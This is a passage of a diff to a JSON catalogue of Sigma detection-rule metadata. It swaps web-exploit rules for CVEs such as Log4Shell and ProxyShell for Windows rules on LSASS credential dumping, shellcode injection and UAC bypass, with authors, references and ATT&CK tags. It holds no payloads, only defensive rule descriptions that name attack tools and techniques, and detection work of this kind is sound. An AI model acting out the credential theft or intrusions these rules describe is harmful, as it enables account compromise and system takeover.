"web_cve_2021_22123_fortinet_exploit.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22123_fortinet_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "f425637f-891c-4191-a6c4-3bb1b70513b4", - "value": "Fortinet CVE-2021-22123 Exploitation" - }, - { - "description": "This rule detects exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893)", - "meta": { - "author": "Sittikorn S", - "creation_date": "2021/06/29", - "falsepositive": [ - "Vulnerability 
Scanning" - ], - "filename": "web_cve_2021_22893_pulse_secure_rce_exploit.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22893_pulse_secure_rce_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "5525edac-f599-4bfd-b926-3fa69860e766", - "value": "Pulse Connect Secure RCE Attack CVE-2021-22893" - }, - { - "description": "Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/05/22", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2021_26814_wzuh_rce.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://github.com/WickdDavid/CVE-2021-26814/blob/6a17355a10ec4db771d0f112cbe031e418d829d5/PoC.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26814_wzuh_rce.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "cve.2021.21978", - "cve.2021.26814" - ] - }, - "uuid": "b9888738-29ed-4c54-96a4-f38c57b84bb3", - "value": "Exploitation of CVE-2021-26814 in Wazuh" - }, - { - "description": "When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories", - "meta": { - "author": "frack113", - "creation_date": "2021/08/10", + "author": "Patryk Prauze - ING Tech", + "creation_date": "2019/05/20", "falsepositive": [ "Unlikely" ], - "filename": "web_cve_2021_26858_iis_rce.yml", - "level": "critical", - "logsource.category": "webserver", + "filename": "proc_access_win_mimikatz_trough_winrm.yml", + "level": "high", + 
"logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26858_iis_rce.yml" + "https://pentestlab.blog/2018/05/15/lateral-movement-winrm/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_mimikatz_trough_winrm.yml" ], - "tags": "No established tags" + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006", + "attack.s0002" + ] }, - "uuid": "effee1f6-a932-4297-a81f-acb44064fa3a", - "value": "ProxyLogon Reset Virtual Directories Based On IIS Log" + "uuid": "aa35a627-33fb-4d04-a165-d33b4afca3e8", + "value": "Mimikatz through Windows Remote Management" }, { - "description": "Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", "meta": { "author": "Florian Roth", - "creation_date": "2021/05/14", + "creation_date": "2012/06/27", + "falsepositive": [ + "Actual failures in lsass.exe that trigger a crash dump (unlikely)", + "Unknown cases in which WerFault accesses lsass.exe" + ], + "filename": "proc_access_win_lsass_werfault.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_werfault.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ] + }, + "uuid": 
"e5b33f7d-eb93-48b6-9851-09e1e610b6d7", + "value": "WerFault Accassing LSASS" + }, + { + "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", + "meta": { + "author": "John Lambert (tech), Florian Roth (rule)", + "creation_date": "2017/03/04", "falsepositive": [ "Unknown" ], - "filename": "web_cve_2021_28480_exchange_exploit.yml", + "filename": "proc_access_win_malware_verclsid_shellcode.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/JohnLaTwC/status/837743453039534080", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_malware_verclsid_shellcode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", + "value": "Malware Shellcode in Verclsid Target Process" + }, + { + "description": "Detects LSASS process access by LaZagne for credential dumping.", + "meta": { + "author": "Bhabesh Raj, Jonhnathan Ribeiro", + "creation_date": "2020/09/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml", "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", + "logsource.category": "process_access", + "logsource.product": "windows", "refs": [ - "https://twitter.com/GossiTheDog/status/1392965209132871683?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_28480_exchange_exploit.yml" + "https://twitter.com/bh4b3sh/status/1303674603819081728", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lazagne_cred_dump_lsass_access.yml" ], "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.credential_access", + "attack.t1003.001", + "attack.s0349" ] }, - "uuid": "a2a9d722-0acb-4096-bccc-daaf91a5037b", 
- "value": "Exchange Exploitation CVE-2021-28480" + "uuid": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", + "value": "Credential Dumping by LaZagne" }, { - "description": "Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766", + "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", "meta": { - "author": "Florian Roth, Max Altgelt, Christian Burkard", - "creation_date": "2021/08/30", + "author": "Florent Labouyrie", + "creation_date": "2021/04/30", "falsepositive": [ - "Unknown" + "Non identified legit exectubale" ], - "filename": "web_cve_2021_33766_msexchange_proxytoken.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_33766_msexchange_proxytoken.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "56973b50-3382-4b56-bdf5-f51a3183797a", - "value": "CVE-2021-33766 Exchange ProxyToken Exploitation" - }, - { - "description": "Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539", - "meta": { - "author": "Tobias Michalski, Max Altgelt", - "creation_date": "2021/09/20", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2021_40539_adselfservice.yml", + "filename": "proc_access_win_svchost_cred_dump.yml", "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", + "logsource.category": "process_access", + "logsource.product": "windows", "refs": [ - "https://us-cert.cisa.gov/ncas/alerts/aa21-259a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_adselfservice.yml" - ], - "tags": "No established tags" - }, - 
"uuid": "6702b13c-e421-44cc-ab33-42cc25570f11", - "value": "ADSelfService Exploitation" - }, - { - "description": "Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).", - "meta": { - "author": "Sittikorn S, Nuttakorn Tungpoonsup", - "creation_date": "2021/09/10", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2021_40539_manageengine_adselfservice_exploit.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/", - "https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html", - "https://us-cert.cisa.gov/ncas/alerts/aa21-259a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_svchost_cred_dump.yml" ], "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.persistence", - "attack.t1505.003" + "attack.t1548" ] }, - "uuid": "fcbb4a77-f368-4945-b046-4499a1da69d1", - "value": "CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit" + "uuid": "174afcfa-6e40-4ae9-af64-496546389294", + "value": "SVCHOST Credential Dump" }, { - "description": "Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49.\nAn attacker could use a path traversal attack to map URLs to files outside the expected document root.\nIf files outside of the document root are not protected by \"require all denied\" these requests can succeed.\nAdditionally this flaw could leak the source of interpreted files like CGI scripts.\nThis issue is known to be exploited in the wild. 
This issue only affects Apache 2.4.49 and not earlier versions.\n", + "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", "meta": { - "author": "daffainfo, Florian Roth", - "creation_date": "2021/10/05", + "author": "Christian Burkard", + "creation_date": "2021/08/23", "falsepositive": [ "Unknown" ], - "filename": "web_cve_2021_41773_apache_path_traversal.yml", + "filename": "proc_access_win_uac_bypass_wow64_logger.yml", "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", + "logsource.category": "process_access", + "logsource.product": "windows", "refs": [ - "https://nvd.nist.gov/vuln/detail/CVE-2021-41773", - "https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782", - "https://twitter.com/ptswarm/status/1445376079548624899", - "https://twitter.com/h4x0r_dz/status/1445401960371429381", - "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml", - "https://twitter.com/bl4sty/status/1445462677824761878", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_41773_apache_path_traversal.yml" + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml" ], "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ] }, - "uuid": "3007fec6-e761-4319-91af-e32e20ac43f5", - "value": "CVE-2021-41773 Exploitation Attempt" + "uuid": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", + "value": "UAC Bypass Using WOW64 Logger DLL Hijack" }, { - "description": "Detects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace 
pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "meta": { + "author": "Samir Bousseaden, Michael Haag", + "creation_date": "2019/04/03", + "falsepositive": [ + "False positives are present when looking for 0x1410. Exclusions may be required." + ], + "filename": "proc_access_win_lsass_memdump.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md", + "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://research.splunk.com/endpoint/windows_possible_credential_dumping/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ] + }, + "uuid": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", + "value": "LSASS Memory Dump" + }, + { + "description": "Detects processes requesting access to LSASS memory via suspicious access masks. 
This is typical for credentials dumping tools", + "meta": { + "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community (update)", + "creation_date": "2017/02/16", + "falsepositive": [ + "Legitimate software accessing LSASS process for legitimate reason; please add more filters" + ], + "filename": "proc_access_win_cred_dump_lsass_access.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002", + "car.2019-04-004" + ] + }, + "uuid": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", + "value": "Credential Dumping Tools Accessing LSASS Memory" + }, + { + "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)", "meta": { "author": "Florian Roth", - "creation_date": "2021/11/17", + "creation_date": "2022/03/13", "falsepositive": [ - "Vulnerability Scanning" + "Legitimate software accessing LSASS process for legitimate reason" ], - "filename": "web_cve_2021_42237_sitecore_report_ashx.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://blog.assetnote.io/2021/11/02/sitecore-rce/", - 
"https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_42237_sitecore_report_ashx.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "20c6ed1c-f7f0-4ea3-aa65-4f198e6acb0f", - "value": "Sitecore Pre-Auth RCE CVE-2021-42237" - }, - { - "description": "Detects a successful Grafana path traversal exploitation", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/12/08", - "falsepositive": [ - "Vulnerability scanners that scan a host that returns 200 status codes even in cases of a file not found or other error" - ], - "filename": "web_cve_2021_43798_grafana.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/", - "https://github.com/search?q=CVE-2021-43798", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_43798_grafana.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "7b72b328-5708-414f-9a2a-6a6867c26e16", - "value": "Grafana Path Traversal Exploitation CVE-2021-43798" - }, - { - "description": "Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/12/10", - "falsepositive": [ - "Vulnerability scanning" - ], - "filename": "web_cve_2021_44228_log4j.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://www.lunasec.io/docs/blog/log4j-zero-day/", - "https://news.ycombinator.com/item?id=29504755", - "https://github.com/tangxiaofeng7/apache-log4j-poc", - "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", - "https://github.com/YfryTchsGD/Log4jAttackSurface", - 
"https://twitter.com/shutingrz/status/1469255861394866177?s=21", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "5ea8faa8-db8b-45be-89b0-151b84c82702", - "value": "Log4j RCE CVE-2021-44228 Generic" - }, - { - "description": "Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/12/10", - "falsepositive": [ - "Vulnerability scanning" - ], - "filename": "web_cve_2021_44228_log4j_fields.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://www.lunasec.io/docs/blog/log4j-zero-day/", - "https://news.ycombinator.com/item?id=29504755", - "https://github.com/tangxiaofeng7/apache-log4j-poc", - "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", - "https://github.com/YfryTchsGD/Log4jAttackSurface", - "https://twitter.com/shutingrz/status/1469255861394866177?s=21", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j_fields.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "9be472ed-893c-4ec0-94da-312d2765f654", - "value": "Log4j RCE CVE-2021-44228 in Fields" - }, - { - "description": "Detects an attempt to leverage the vulnerable servlet \"mboximport\" for an unauthenticated remote command injection", - "meta": { - "author": "@gott_cyber", - "creation_date": "2022/08/17", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2022_27925_exploit.yml", + "filename": "proc_access_win_rare_proc_access_lsass.yml", "level": "medium", - "logsource.category": "webserver", - "logsource.product": "No established product", + "logsource.category": "process_access", + "logsource.product": "windows", "refs": [ - 
"https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/", - "https://www.yang99.top/index.php/archives/82/", - "https://github.com/vnhacker1337/CVE-2022-27925-PoC", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_27925_exploit.yml" + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml" ], "tags": [ - "attack.initial_access", - "attack.t1190", - "cve.2022.27925" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ] }, - "uuid": "dd218fb6-4d02-42dc-85f0-a0a376072efd", - "value": "Zimbra Collaboration Suite Email Server Unauthenticated RCE" + "uuid": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", + "value": "Rare GrantedAccess Flags on LSASS Access" }, { - "description": "Detects the exploitation of VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users.\nA malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/12", - "falsepositive": [ - "Vulnerability scanners" - ], - "filename": "web_cve_2022_31656_auth_bypass.yml", - "level": "high", - "logsource.category": 
"webserver", - "logsource.product": "No established product", - "refs": [ - "https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_31656_auth_bypass.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "fcf1101d-07c9-49b2-ad81-7e421ff96d80", - "value": "CVE-2022-31656 VMware Workspace ONE Access Auth Bypass" - }, - { - "description": "Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/12", - "falsepositive": [ - "Vulnerability scanners", - "Legitimate access to the URI" - ], - "filename": "web_cve_2022_31659_vmware_rce.yml", - "level": "medium", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_31659_vmware_rce.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "efdb2003-a922-48aa-8f37-8b80021a9706", - "value": "CVE-2022-31659 VMware Workspace ONE Access RCE" - }, - { - "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/19", - "falsepositive": [ - "Web vulnerability scanners" - ], - "filename": "web_cve_2022_33891_spark_shell_command_injection.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", - 
"https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", - "https://github.com/apache/spark/pull/36315/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_33891_spark_shell_command_injection.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "cve.2022.33891" - ] - }, - "uuid": "1a9a04fd-02d1-465c-abad-d733fd409f9c", - "value": "Apache Spark Shell Command Injection - Weblogs" - }, - { - "description": "Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/29", - "falsepositive": [ - "Web vulnerability scanners" - ], - "filename": "web_cve_2022_36804_atlassian_bitbucket_command_injection.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://twitter.com/_0xf4n9x_/status/1572052954538192901", - "https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/", - "https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html", - "https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "cve.2022.36804" - ] - }, - "uuid": "65c0a0ab-d675-4441-bd6b-d3db226a2685", - "value": "Atlassian Bitbucket Command Injection Via Archive API" - }, - { - "description": "Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity", + "description": "Detects process access to LSASS memory with suspicious access flags", "meta": { "author": "Florian Roth", - "creation_date": "2021/03/03", + "creation_date": "2021/11/22", "falsepositive": [ - 
"Legitimate access to other web applications that use the same folder names as Exchange (e.g. owa, ecp) but are not Microsoft Exchange related" + "Legitimate software accessing LSASS process for legitimate reason" ], - "filename": "web_exchange_exploitation_hafnium.yml", + "filename": "proc_access_win_susp_proc_access_lsass.yml", "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", + "logsource.category": "process_access", + "logsource.product": "windows", "refs": [ - "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", - "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_exploitation_hafnium.yml" + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml" ], "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ] }, - "uuid": "67bce556-312f-4c81-9162-c3c9ff2599b2", - "value": "Exchange Exploitation Used by HAFNIUM" + "uuid": "a18dd26b-6450-46de-8c91-9659150cf088", + "value": "Suspicious GrantedAccess Flags on LSASS Access" }, { - "description": "Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful)", + "description": "Detects the 
usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", "meta": { - "author": "Florian Roth, Rich Warren", - "creation_date": "2021/08/07", + "author": "Christian Burkard, Tim Shelton", + "creation_date": "2021/07/28", "falsepositive": [ "Unknown" ], - "filename": "web_exchange_proxyshell.yml", + "filename": "proc_access_win_direct_syscall_ntopenprocess.yml", "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", + "logsource.category": "process_access", + "logsource.product": "windows", "refs": [ - "https://youtu.be/5mqid-7zp8k?t=2231", - "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", - "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell.yml" + "https://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml" ], "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.execution", + "attack.t1106" ] }, - "uuid": "23eee45e-933b-49f9-ae1b-df706d2d52ef", - "value": "Exchange ProxyShell Pattern" + "uuid": "3f3f3506-1895-401b-9cc3-e86b16e630d0", + "value": "Direct Syscall of NtOpenProcess" }, { - "description": "Detects URP patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers", + "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", "meta": { - "author": "Florian Roth, Rich Warren", + "author": "Bhabesh Raj", + "creation_date": "2022/03/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_shellcode_inject_msf_empire.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": 
"windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_shellcode_inject_msf_empire.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "250ae82f-736e-4844-a68b-0b5e8cc887da", + "value": "Potential Shellcode Injection" + }, + { + "description": "Detects the process injection of a LittleCorporal generated Maldoc.", + "meta": { + "author": "Christian Burkard", "creation_date": "2021/08/09", "falsepositive": [ "Unknown" ], - "filename": "web_exchange_proxyshell_successful.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", + "filename": "proc_access_win_littlecorporal_generated_maldoc.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", "refs": [ - "https://youtu.be/5mqid-7zp8k?t=2231", - "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", - "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell_successful.yml" + "https://github.com/connormcgarr/LittleCorporal", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_littlecorporal_generated_maldoc.yml" ], "tags": [ - "attack.initial_access" + "attack.execution", + "attack.t1204.002", + "attack.t1055.003" ] }, - "uuid": "992be1eb-e5da-437e-9a54-6d13b57bb4d8", - "value": "Successful Exchange ProxyShell Attack" + "uuid": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "value": "LittleCorporal Generated Maldoc Injection" }, { - "description": "When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol \"~\"", + "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", "meta": { - "author": "frack113", - 
